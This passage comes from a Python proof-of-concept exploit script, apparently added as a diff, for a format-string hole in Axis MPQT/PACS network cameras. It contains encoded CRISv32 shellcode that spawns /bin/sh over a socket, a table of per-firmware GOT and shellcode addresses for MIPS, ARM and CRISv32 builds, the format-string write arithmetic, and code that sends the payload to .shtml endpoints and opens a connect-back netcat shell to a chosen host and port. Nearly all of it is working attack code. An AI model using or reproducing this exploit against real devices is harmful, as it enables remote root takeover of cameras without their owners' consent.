"%e9%af" # move.d $r10,[$r9+] + "%e9%bf" # move.d $r11,[$r9+] + "%e9%cf" # move.d $r12,[$r9+] + "%43%a2" # moveq 3,$r10 + "%6e%b6" # move.d $sp,$r11 + "%5f%9c%66%00" # movu.w 0x66,$r9 + "%3d%e9" # break 13 + # dup(0) already in socket + #dup(1) + "%6f%aa" # move.d [$acr],$r10 + "%41%b2" # moveq 1,$r11 + "%5f%9c%3f%00" # movu.w 0x3f,$r9 + "%3d%e9" # break 13 + # + #dup(2) + "%6f%aa" # move.d [$acr],$r10 + "%42%b2" # moveq 2,$r11 + "%5f%9c%3f%00" # movu.w 0x3f,$r9 + "%3d%e9" # break 13 + # + #execve("/bin/sh",NULL,NULL) + "%90%e2" # subq 16,$sp + "%6e%96" # move.d $sp,$r9 + "%6e%a6" # move.d $sp,$10 + "%6f%0e%2f%2f%62%69" # move.d 69622f2f,$r0 + "%e9%0b" # move.d $r0,[$r9] + "%04%92" # addq 4,$r9 + "%6f%0e%6e%2f%73%68" # move.d 68732f6e,$r0 + "%e9%0b" # move.d $r0,[$r9] + "%04%92" # addq 4,$r9 + "%79%8a" # clear.d [$r9] + "%04%92" # addq 4,$r9 + "%79%8a" # clear.d [$r9] + "%04%92" # addq 4,$r9 + "%e9%ab" # move.d $r10,[$r9] + "%04%92" # addq 4,$r9 + "%79%8a" # clear.d [$r9] + "%10%e2" # addq 16,$sp + "%6e%f6" # move.d $sp,$acr + "%6e%96" # move.d $sp,$r9 + "%6e%b6" # move.d 
$sp,$r11 + "%7c%86" # clear.d $r12 + "%4b%92" # moveq 11,$r9 + "%3d%e9" # break 13 + ], '') + + + if self.target == 'MIPSel': + return MIPSel + elif self.target == 'ARMel': + return ARMel + elif self.target == 'CRISv32': + return CRISv32 + elif self.target == 'NCSH1': + return NCSH + elif self.target == 'NCSH2': + return NCSH + else: + print "[!] Unknown shellcode! (%s)" % str(self.target) + sys.exit(1) + + +class FMSdb: + + def __init__(self,targetIP,verbose): + self.targetIP = targetIP + self.verbose = verbose + + def FMSkey(self,target): + self.target = target + + target_db = { + +#----------------------------------------------------------------------- +# All pointing from free() GOT to shellcode on .bss (Except ARM with NCSH) +#----------------------------------------------------------------------- + +# +# Using POP format string, AKA 'Old Style' +# + # MPQT + 'MIPS-5.85.x': [ + 0x41f370, # Adjust to GOT free() address + 0x420900, # .bss shellcode address + 2, # 1st POP's + 2, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.40.3': [ + 0x41e41c, # Adjust to GOT free() address + 0x4208cc, # .bss shellcode address + 7, # 1st POP's + 11, # 2nd POP's + 'ax', # Aligns injected code + 450, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.4x': [ + 0x41e4cc, # Adjust to GOT free() address + 0x42097c, # .bss shellcode address + 7, # 1st POP's + 11, # 2nd POP's + 'ax', # Aligns injected code + 450, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.5x': [ + 0x41d11c, # Adjust to GOT free() address + 0x41f728, # .bss shellcode address + 5, # 1st POP's + 15, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.55x': [ + 0x41d11c, # Adjust to GOT free() address + 0x41f728, # .bss shellcode address + 11, # 1st POP's + 9, # 2nd 
POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # Shared with MPQT and PACS + 'MIPS-5.6x': [ + 0x41d048, # Adjust to GOT free() address + 0x41f728, # .bss shellcode address + 5, # 1st POP's + 15, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + + ], + + # MPQT + 'MIPS-5.7x': [ + 0x41d04c, # Adjust to GOT free() address + 0x41f718, # .bss shellcode address + 2, # 1st POP's + 14, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.75x': [ + 0x41c498, # Adjust to GOT free() address + 0x41daf0, # .bss shellcode address + 3, # 1st POP's + 13, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # Shared with MPQT and PACS + 'MIPS-5.8x': [ + 0x41d0c0, # Adjust to GOT free() address + 0x41e740, # .bss shellcode address + 3, # 1st POP's + 13, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.9x': [ + 0x41d0c0, # Adjust to GOT free() address + 0x41e750, # .bss shellcode address + 3, # 1st POP's + 13, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-6.1x': [ + 0x41c480, # Adjust to GOT free() address + 0x41dac0, # .bss shellcode address + 3, # 1st POP's + 13, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-6.2x': [ + 0x41e578, # Adjust to GOT free() address + 0x41fae0, # .bss shellcode address + 2, # 1st POP's + 2, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-6.20x': [ + 0x41d0c4, # Adjust to GOT free() address + 0x41e700, # .bss 
shellcode address + 3, # 1st POP's + 13, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # PACS + 'MIPS-1.3x': [ + 0x41e4cc, # Adjust to GOT free() address + 0x420a78, # .bss shellcode address + 7, # 1st POP's + 11, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # PACS + 'MIPS-1.1x': [ + 0x41e268, # Adjust to GOT free() address + 0x420818, # .bss shellcode address + 7, # 1st POP's + 11, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + +# +# Tested with execstack to set executable stack flag bit on bin's and lib's +# +# These two 'Old Style' are not used in the exploit, but kept here as reference as they has been confirmed working. +# + + # ARMel with bin/libs executable stack flag set with 'execstack' + # MPQT + 'ARM-5.50x': [ # + 0x1c1b4, # Adjust to GOT free() address + 0x1e7c8, # .bss shellcode address + 93, # 1st POP's + 1, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'ARMel' # Shellcode type (ARMel) + ], + + # ARMel with bin/libs executable stack flag set with 'execstack' + # MPQT + 'ARM-5.55x': [ # + 0x1c15c, # Adjust to GOT free() address + 0x1e834, # .bss shellcode address + 59, # 1st POP's + 80, # 2nd POP's + 'axis', # Aligns injected code + 800, # How big buffer before shellcode + 'ARMel' # Shellcode type (ARMel) + ], + +# +# Using direct parameter access format string, AKA 'New Style' +# + # MPQT + 'ARM-NCSH-5.20x': [ # AXIS P1311 5.20 (id=root) + 0x1c1b4, # Adjust to GOT free() address + 0x10178, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 61, # 1st POP's + 115, # 2nd POP's + 143, # 3rd POP's + 118, # 4th POP's + 'NCSH2' # Shellcode type (Netcat Shell) + ], + + # MPQT + 'ARM-NCSH-5.2x': [ # + 0x1c1b4, # Adjust to GOT free() address + 0x1013c, # Adjust to "/bin/sh -c; pipe(); vfork(); 
execve()" + 61, # 1st POP's + 115, # 2nd POP's + 143, # 3rd POP's + 118, # 4th POP's + 'NCSH2' # Shellcode type (Netcat Shell) + ], + + # MPQT + 'ARM-NCSH-5.4x': [ # + 0x1c1b4, # Adjust to GOT free() address + 0x101fc, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 61, # 1st POP's + 115, # 2nd POP's + 143, # 3rd POP's + 118, # 4th POP's + 'NCSH2' # Shellcode type (Netcat Shell) + ], +# +# Using POP format string, AKA 'Old Style' +# + + # MPQT + 'ARM-NCSH-5.5x': [ # + 0x1c15c, # Adjust to GOT free() address + 0xfdcc, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 97, # 1st POP's + 0, # 2nd POP's + 41, # 3rd POP's + 0, # 4th POP's + 'NCSH1' # Shellcode type (Netcat Shell) + ], + + # MPQT + 'ARM-NCSH-5.6x': [ # + 0x1c15c, # Adjust to GOT free() address + 0xfcec, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 97, # 1st POP's + 0, # 2nd POP's + 41, # 3rd POP's + 0, # 4th POP's + 'NCSH1' # Shellcode type (Netcat Shell) + ], + + # MPQT + 'ARM-NCSH-5.7x': [ # + 0x1c1c0, # Adjust to GOT free() address + 0xf800, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 132, # 1st POP's + 0, # 2nd POP's + 34, # 3rd POP's + 0, # 4th POP's + 'NCSH1' # Shellcode type (Netcat Shell) + ], + + # Will go in endless loop after exit of nc shell... 
DoS sux + # MPQT + 'ARM-NCSH-5.8x': [ # + 0x1b39c, # Adjust to GOT free() address + 0xf8c0, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 98, # 1st POP's + 0, # 2nd POP's + 34, # 3rd POP's + 1, # 4th POP's + 'NCSH1' # Shellcode type (Netcat Shell) + ], + + # MPQT + 'ARM-NCSH-6.1x': [ # + 0x1d2a4, # Adjust to GOT free() address +# 0xecc4, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 0xecc8, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 106, # 1st POP's + 0, # 2nd POP's + 34, # 3rd POP's + 1, # 4th POP's + 'NCSH1' # Shellcode type (Netcat Shell) + ], +# +# Using POP format string, AKA 'Old Style' +# + + # MPQT + 'CRISv32-5.5x': [ # + 0x8d148, # Adjust to GOT free() address + 0x8f5a8, # .bss shellcode address + 4, # 1st POP's + 13, # 2nd POP's + 'axis', # Aligns injected code + 470, # How big buffer before shellcode + 'CRISv32' # Shellcode type (Crisv32) + ], + + # MPQT + 'CRISv32-5.4x': [ # + 0x8d0e0, # Adjust to GOT free() address + 0x8f542, # .bss shellcode address + 4, # 1st POP's + 13, # 2nd POP's + 'axis', # Aligns injected code + 470, # How big buffer before shellcode + 'CRISv32' # Shellcode type (Crisv32) + ], + + # MPQT + 'CRISv32-5.2x': [ # + 0x8d0b4, # Adjust to GOT free() address + 0x8f4d6, # .bss shellcode address + 4, # 1st POP's + 13, # 2nd POP's + 'axis', # Aligns injected code + 470, # How big buffer before shellcode + 'CRISv32' # Shellcode type (Crisv32) + ], + + # MPQT + 'CRISv32-5.20.0': [ # + 0x8d0e4, # Adjust to GOT free() address + 0x8f546, # .bss shellcode address + 4, # 1st POP's + 13, # 2nd POP's + 'axis', # Aligns injected code + 470, # How big buffer before shellcode + 'CRISv32' # Shellcode type (Crisv32) + ] + + + } + + if self.target == 0: + return target_db + + if not self.target in target_db: + print "[!] Unknown FMS key: %s!" 
% self.target + sys.exit(1) + + if self.verbose: + print "[Verbose] Number of availible FMS keys:",len(target_db) + + return target_db + + +# +# Validate correctness of HOST, IP and PORT +# +class Validate: + + def __init__(self,verbose): + self.verbose = verbose + + # Check if IP is valid + def CheckIP(self,IP): + self.IP = IP + + ip = self.IP.split('.') + if len(ip) != 4: + return False + for tmp in ip: + if not tmp.isdigit(): + return False + i = int(tmp) + if i < 0 or i > 255: + return False + return True + + # Check if PORT is valid + def Port(self,PORT): + self.PORT = PORT + + if int(self.PORT) < 1 or int(self.PORT) > 65535: + return False + else: + return True + + # Check if HOST is valid + def Host(self,HOST): + self.HOST = HOST + + try: + # Check valid IP + socket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP + # Or we check again if it is correct typed IP + if self.CheckIP(self.HOST): + return self.HOST + else: + return False + except socket.error as e: + # Else check valid DNS name, and use the IP address + try: + self.HOST = socket.gethostbyname(self.HOST) + return self.HOST + except socket.error as e: + return False + + + +if __name__ == '__main__': + +# +# Help, info and pre-defined values +# + INFO = '[Axis Communications MPQT/PACS remote exploit 2016 bashis ]' + HTTP = "http" + HTTPS = "https" + proto = HTTP + verbose = False + noexploit = False + lhost = '192.168.0.1' # Default Local HOST + lport = '31337' # Default Local PORT + rhost = '192.168.0.90' # Default Remote HOST + rport = '80' # Default Remote PORT + # Not needed for the SSI exploit, here for possible future usage. 
+# creds = 'root:pass' + creds = False + +# +# Try to parse all arguments +# + try: + arg_parser = argparse.ArgumentParser( +# prog=sys.argv[0], + prog='axis-ssid-PoC.py', + description=('[*]' + INFO + '\n')) + arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']') + arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']') + arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']') + arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']') + arg_parser.add_argument('--fms', required=False, help='Manual FMS key') + if creds: + arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']') + arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]') + arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]') + arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]') + arg_parser.add_argument('--dict', required=False, default=False, action='store_true', help='Print FMS keys and stats from dictionary, additional details with --verbose') + args = arg_parser.parse_args() + except Exception as e: + print INFO,"\nError: %s\n" % str(e) + sys.exit(1) + + # We want at least one argument, so print out help + if len(sys.argv) == 1: + arg_parser.parse_args(['-h']) + + print "\n[*]",INFO + + if args.verbose: + verbose = args.verbose + + # Print out info from dictionary + if args.dict: + target = FMSdb(rhost,verbose).FMSkey(0) + print "[db] Number of FMS keys:",len(target) + + # Print out detailed info from dictionary + if verbose: + + print "[db] 
Target details of FMS Keys availible for manual xploiting" + print "\n[FMS Key]\t[GOT Address]\t[BinSh Address]\t[POP1]\t[POP2]\t[POP3]\t[POP4]\t[Shellcode]" + + for tmp in range(0,len(target)): + Key = sorted(target.keys())[tmp] + temp = re.split('[-]',Key)[0:10] + + if temp[1] == 'NCSH': + print Key,'\t','0x{:08x}'.format(target[Key][0]),'\t','0x{:08x}'.format(target[Key][1]),'\t',target[Key][2],'\t',target[Key][3],'\t',target[Key][4],'\t',target[Key][5],'\t',target[Key][6] + + print "\n[FMS Key]\t[GOT Address]\t[BSS Address]\t[POP1]\t[POP2]\t[Align]\t[Buf]\t[Shellcode]" + for tmp in range(0,len(target)): + Key = sorted(target.keys())[tmp] + temp = re.split('[-]',Key)[0:10] + + if temp[1] != 'NCSH': + print Key,'\t','0x{:08x}'.format(target[Key][0]),'\t','0x{:08x}'.format(target[Key][1]),'\t',target[Key][2],'\t',target[Key][3],'\t',len(target[Key][4]),'\t',target[Key][5],'\t',target[Key][6] + + print "\n" + else: + print "[db] Target FMS Keys availible for manual xploiting instead of using auto mode:" + Key = "" + for tmp in range(0,len(target)): + Key += sorted(target.keys())[tmp] + Key += ', ' + print '\n',Key,'\n' + sys.exit(0) + +# +# Check validity, update if needed, of provided options +# + if args.https: + proto = HTTPS + if not args.rport: + rport = '443' + + if creds and args.auth: + creds = args.auth + + if args.noexploit: + noexploit = args.noexploit + + if args.rport: + rport = args.rport + + if args.rhost: + rhost = args.rhost + + if args.lport: + lport = args.lport + + if args.lhost: + lhost = args.lhost + + # Check if LPORT is valid + if not Validate(verbose).Port(lport): + print "[!] Invalid LPORT - Choose between 1 and 65535" + sys.exit(1) + + # Check if RPORT is valid + if not Validate(verbose).Port(rport): + print "[!] Invalid RPORT - Choose between 1 and 65535" + sys.exit(1) + + # Check if LHOST is valid IP or FQDN, get IP back + lhost = Validate(verbose).Host(lhost) + if not lhost: + print "[!] 
Invalid LHOST" + sys.exit(1) + + # Check if RHOST is valid IP or FQDN, get IP back + rhost = Validate(verbose).Host(rhost) + if not rhost: + print "[!] Invalid RHOST" + sys.exit(1) + + +# +# Validation done, start print out stuff to the user +# + if noexploit: + print "[i] Test mode selected, no exploiting..." + if args.https: + print "[i] HTTPS / SSL Mode Selected" + print "[i] Remote target IP:",rhost + print "[i] Remote target PORT:",rport + print "[i] Connect back IP:",lhost + print "[i] Connect back PORT:",lport + + rhost = rhost + ':' + rport + +# +# FMS key is required into this PoC +# + if not args.fms: + print "[!] FMS key is required!" + sys.exit(1) + else: + Key = args.fms + print "[i] Trying with FMS key:",Key + +# +# Prepare exploiting +# + # Look up the FMS key in dictionary and return pointer for FMS details to use + target = FMSdb(rhost,verbose).FMSkey(Key) + + if target[Key][6] == 'NCSH1': + NCSH1 = target[Key][6] + NCSH2 = "" + elif target[Key][6] == 'NCSH2': + NCSH2 = target[Key][6] + NCSH1 = "" + else: + NCSH1 = "" + NCSH2 = "" + + if Key == 'ARM-NCSH-5.8x': + print "\nExploit working, but will end up in endless loop after exiting remote NCSH\nDoS sux, so I'm exiting before that shit....\n\n" + sys.exit(0) + + print "[i] Preparing shellcode:",str(target[Key][6]) + + # We don't use url encoded shellcode with Netcat shell + # This is for MIPS/CRISv32 and ARM shellcode + if not NCSH1 and not NCSH2: + FMSdata = target[Key][4] # This entry aligns the injected shellcode + + # Building up the url encoded shellcode for sending to the target, + # and replacing LHOST / LPORT in shellcode to choosen values + + # part of first 500 decoded bytes will be overwritten during stage #2, and since + # there is different 'tailing' on the request internally, keep it little more than needed, to be safe. + # Let it be 0x00, just for fun. 
+ FMSdata += '%00' * target[Key][5]
+
+ # Connect back IP to url encoded
+ ip_hex = '%{:02x} %{:02x} %{:02x} %{:02x}'.format(*map(int, lhost.split('.')))
+ ip_hex = ip_hex.split()
+ IP1=ip_hex[0];IP2=ip_hex[1];IP3=ip_hex[2];IP4=ip_hex[3];
+
+ # Let's break apart the hex code of LPORT into two bytes
+ port_hex = hex(int(lport))[2:]
+ port_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2)
+ port_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2))
+ port_hex = port_hex.split()
+
+ if (target[Key][6]) == 'MIPSel':
+ # Connect back PORT
+ if len(port_hex) == 1:
+ PP1 = "%ff"
+ PP0 = '%{:02x}'.format((int(port_hex[0],16)-1))
+ elif len(port_hex) == 2:
+ # Little Endian
+ PP1 = '%{:02x}'.format((int(port_hex[0],16)-1))
+ PP0 = '%{:02x}'.format(int(port_hex[1],16))
+ elif (target[Key][6]) == 'ARMel': # Could be combinded with CRISv32
+ # Connect back PORT
+ if len(port_hex) == 1:
+ PP1 = "%00"
+ PP0 = '%{:02x}'.format(int(port_hex[0],16))
+ elif len(port_hex) == 2:
+ # Little Endian
+ PP1 = '%{:02x}'.format(int(port_hex[0],16))
+ PP0 = '%{:02x}'.format(int(port_hex[1],16))
+ elif (target[Key][6]) == 'CRISv32':
+ # Connect back PORT
+ if len(port_hex) == 1:
+ PP1 = "%00"
+ PP0 = '%{:02x}'.format(int(port_hex[0],16))
+ elif len(port_hex) == 2:
+ # Little Endian
+ PP1 = '%{:02x}'.format(int(port_hex[0],16))
+ PP0 = '%{:02x}'.format(int(port_hex[1],16))
+ else:
+ print "[!] Unknown shellcode! 
(%s)" % str(target[Key][6]) + sys.exit(1) + + # Replace LHOST / LPORT in URL encoded shellcode + shell = shellcode_db(rhost,verbose).sc(target[Key][6]) + shell = shell.replace("IP1",IP1) + shell = shell.replace("IP2",IP2) + shell = shell.replace("IP3",IP3) + shell = shell.replace("IP4",IP4) + shell = shell.replace("PP0",PP0) + shell = shell.replace("PP1",PP1) + FMSdata += shell + +# +# Calculate the FMS values to be used +# + # Get pre-defined values + ALREADY_WRITTEN = 40 # Already 'written' in the daemon before our FMS +# POP_SIZE = 8 + POP_SIZE = 1 + + GOThex = target[Key][0] + BSShex = target[Key][1] + GOTint = int(GOThex) + + # 'One-Write-Where-And-What' + if not NCSH1 and not NCSH2: + + POP1 = target[Key][2] + POP2 = target[Key][3] + + # Calculate for creating the FMS code + ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE) + GOTint = (GOTint - ALREADY_WRITTEN) + + ALREADY_WRITTEN = ALREADY_WRITTEN + (POP2 * POP_SIZE) + + BSSint = int(BSShex) + BSSint = (BSSint - GOTint - ALREADY_WRITTEN) + +# if verbose: +# print "[Verbose] Calculated GOTint:",GOTint,"Calculated BSSint:",BSSint + + # 'Two-Write-Where-And-What' using "New Style" + elif NCSH2: + + POP1 = target[Key][2] + POP2 = target[Key][3] + POP3 = target[Key][4] + POP4 = target[Key][5] + POP2_SIZE = 2 + + # We need to count higher than provided address for the jump + BaseAddr = 0x10000 + BSShex + + # Calculate for creating the FMS code + GOTint = (GOTint - ALREADY_WRITTEN) + + ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint + + # Calculate FirstWhat value + FirstWhat = BaseAddr - (ALREADY_WRITTEN) + + ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat + + # Calculate SecondWhat value, so it always is 0x20300 + SecondWhat = 0x20300 - (ALREADY_WRITTEN + POP2_SIZE) + + shell = shellcode_db(rhost,verbose).sc(target[Key][6]) + shell = shell.replace("LHOST",lhost) + shell = shell.replace("LPORT",lport) + + FirstWhat = FirstWhat - len(shell) + +# if verbose: +# print "[Verbose] Calculated GOTint:",GOTint,"Calculated 
FirstWhat:",FirstWhat,"Calculated SecondWhat:",SecondWhat + + + # 'Two-Write-Where-And-What' using "Old Style" + elif NCSH1: + + POP1 = target[Key][2] + POP2 = target[Key][3] + POP3 = target[Key][4] + POP4 = target[Key][5] + POP2_SIZE = 2 + + # FirstWhat writes with 4 bytes (Y) (0x0002YYYY) + # SecondWhat writes with 1 byte (Z) (0x00ZZYYYY) + if BSShex > 0x10000: + MSB = 1 + else: + MSB = 0 + + # We need to count higher than provided address for the jump + BaseAddr = 0x10000 + BSShex + + # Calculate for creating the FMS code + ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE) + + GOTint = (GOTint - ALREADY_WRITTEN) + + ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint + POP2_SIZE + (POP3 * POP_SIZE) + + # Calculate FirstWhat value + FirstWhat = BaseAddr - (ALREADY_WRITTEN) + + ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat + (POP4 * POP_SIZE) + + # Calculate SecondWhat value, so it always is 0x203[00] or [01] + SecondWhat = 0x20300 - (ALREADY_WRITTEN) + MSB + + shell = shellcode_db(rhost,verbose).sc(target[Key][6]) + shell = shell.replace("LHOST",lhost) + shell = shell.replace("LPORT",lport) + + GOTint = GOTint - len(shell) + +# if verbose: +# print "[Verbose] Calculated GOTint:",GOTint,"Calculated FirstWhat:",FirstWhat,"Calculated SecondWhat:",SecondWhat + + else: + print "[!] 
NCSH missing, exiting"
+ sys.exit(1)
+#
+# Let's start the exploiting procedure
+#
+
+#
+# Stage one
+#
+ if NCSH1 or NCSH2:
+
+ # "New Style" needs to make the exploit in two stages
+ if NCSH2:
+ FMScode = do_FMS(rhost,verbose)
+ # Writing 'FirstWhere' and 'SecondWhere'
+ # 1st request
+ FMScode.AddADDR(GOTint) # Run up to free() GOT address
+ #
+ # 1st and 2nd "Write-Where"
+ FMScode.AddDirectParameterN(POP1) # Write 1st Where
+ FMScode.Add("XX") # Jump up two bytes for next address
+ FMScode.AddDirectParameterN(POP2) # Write 2nd Where
+ FMSdata = FMScode.FMSbuild()
+ else:
+ FMSdata = ""
+
+ print "[>] StG_1: Preparing netcat connect back shell to address:",'0x{:08x}'.format(BSShex),"(%d bytes)" % (len(FMSdata))
+ else:
+ print "[>] StG_1: Sending and decoding shellcode to address:",'0x{:08x}'.format(BSShex),"(%d bytes)" % (len(FMSdata))
+
+ # Inject our encoded shellcode to be decoded in MIPS/CRISv32/ARM
+ # Actually, any valid and public readable .shtml file will work...
+ # (One of the two below seems always to be usable)
+ #
+ # For NCSH1 shell, we only check if the remote file are readable, for usage in Stage two
+ # For NCSH2, 1st and 2nd (Write-Where) FMS comes here, and calculations start after '=' in the url
+ #
+ try:
+ target_url = "/httpDisabled.shtml?user_agent="
+ if noexploit:
+ target_url2 = target_url
+ else:
+ target_url2 = "/httpDisabled.shtml?&http_user="
+
+ if NCSH2:
+ html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell
+ else:
+ html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata)
+ except urllib2.HTTPError as e:
+ if e.code == 404:
+ print "[<] Error",e.code,e.reason
+ target_url = "/view/viewer_index.shtml?user_agent="
+ if noexploit:
+ target_url2 = target_url
+ else:
+ target_url2 = "/view/viewer_index.shtml?&http_user="
+ print "[>] Using alternative target shtml"
+ if NCSH2:
+ html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) 
# Netcat shell
+ else:
+ html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata)
+ except Exception as e:
+ if not NCSH2:
+ print "[!] Shellcode delivery failed:",str(e)
+ sys.exit(1)
+#
+# Stage two
+#
+
+#
+# Building and sending the FMS code to the target
+#
+ print "[i] Building the FMS code..."
+
+ FMScode = do_FMS(rhost,verbose)
+
+ # This is an 'One-Write-Where-And-What' for FMS
+ #
+ # Stack Example:
+ #
+ # Stack content | Stack address (ASLR)
+ #
+ # 0x0 | @0x7e818dbc -> [POP1's]
+ # 0x0 | @0x7e818dc0 -> [free () GOT address]
+ # 0x7e818dd0 | @0x7e818dc4>>>>>+ "Write-Where" (%n)
+ # 0x76f41fb8 | @0x7e818dc8 | -> [POP2's]
+ # 0x76f3d70c | @0x7e818dcc | -> [BSS shell code address]
+ # 0x76f55ab8 | @0x7e818dd0<<<<<+ "Write-What" (%n)
+ # 0x1 | @0x7e818dd4
+ #
+ if not NCSH1 and not NCSH2:
+ FMScode.AddPOP(POP1) # 1st serie of 'Old Style' POP's
+ FMScode.AddADDR(GOTint) # GOT Address
+ FMScode.AddWRITEn(1) # 4 bytes Write-Where
+# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx)
+
+ FMScode.AddPOP(POP2) # 2nd serie of 'Old Style' POP's
+ FMScode.AddADDR(BSSint) # BSS shellcode address
+ FMScode.AddWRITEn(1) # 4 bytes Write-What
+# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx)
+
+ # End of 'One-Write-Where-And-What'
+
+
+ # This is an 'Two-Write-Where-And-What' for FMS
+ #
+ # Netcat shell and FMS code in same request, we will jump to the SSI function
+ # We jump over all SSI tagging to end up directly where "xxx" will
+ # be the string passed on to SSI exec function ('/bin/sh -c', pipe(), vfork() and execv())
+ #
+ # The Trick here is to write lower target address, that we will jump to when calling free(),
+ # than the FMS has counted up to, by using Two-Write-Where-and-What with two writes to free() GOT
+ # address with two LSB writes. 
+ #
+ elif NCSH2:
+ #
+ # Direct parameter access for FMS exploitation are really nice and easy to use.
+ # However, we need to exploit in two stages with two requests.
+ # (I was trying to avoid this "Two-Stages" so much as possibly in this exploit developement...)
+ #
+ # 1. Write "Two-Write-Where", where 2nd is two bytes higher than 1st (this allows us to write to MSB and LSB)
+ # 2. Write with "Two-Write-What", where 1st (LSB) and 2nd (MSB) "Write-Where" pointing to.
+ #
+ # With "new style", we can write with POPs independently as we don't depended of same criteria as in "NCSH1",
+ # we can use any regular "Stack-to-Stack" pointer as we can freely choose the POP-and-Write.
+ # [Note the POP1/POP2 (low-high) vs POP3/POP4 (high-low) difference.]
+ #
+ # Stack Example:
+ #
+ # Stack content | Stack address (ASLR)
+ #
+ # 0x7e818dd0 | @0x7e818dc4>>>>>+ 1st "Write-Where" [@Stage One]
+ # 0x76f41fb8 | @0x7e818dc8 |
+ # 0x76f3d70c | @0x7e818dcc |
+ # 0x76f55ab8 | @0x7e818dd0<<<<<+ 1st "Write-What" [@Stage Two]
+ # 0x1 | @0x7e818dd4
+ # [....]
+ # 0x1c154 | @0x7e818e10
+ # 0x7e818e20 | @0x7e818e14>>>>>+ 2nd "Write-Where" [@Stage One]
+ # 0x76f41fb8 | @0x7e818e18 |
+ # 0x76f3d70c | @0x7e818e1c |
+ # 0x76f55758 | @0x7e818e20<<<<<+ 2nd "Write-What" [@Stage Two]
+ # 0x1 | @0x7e818e24
+ #
+
+ FMScode.Add(shell)
+
+ #
+ # 1st and 2nd "Write-Where" already done in stage one
+ #
+ # 1st and 2nd "Write-What"
+ #
+ FMScode.AddADDR(GOTint + FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.
+ FMScode.AddDirectParameterN(POP3) # Write with 4 bytes (we want to zero out in MSB)
+ FMScode.AddADDR(SecondWhat + 3) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. 
(0x00ZZXXXX)
+ FMScode.AddDirectParameterHHN(POP4) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation
+
+ elif NCSH1:
+ # Could use direct argument addressing here, but I like to keep "old style" as well,
+ # as it's another interesting concept.
+ #
+ # Two matching stack contents -> stack address in row w/o or max two POP's between,
+ # is needed to write two bytes higher (MSB).
+ #
+ #
+ # Stack Example:
+ #
+ # Stack Content | @Stack Address (ASLR)
+ #
+ # 0x9c | @7ef2fde8 -> [POP1's]
+ # [....]
+ # 0x1 | @7ef2fdec -> [GOTint address]
+ #------
+ # 0x7ef2fe84 | @7ef2fdf0 >>>>>+ Write 'FirstWhere' (%n) [LSB]
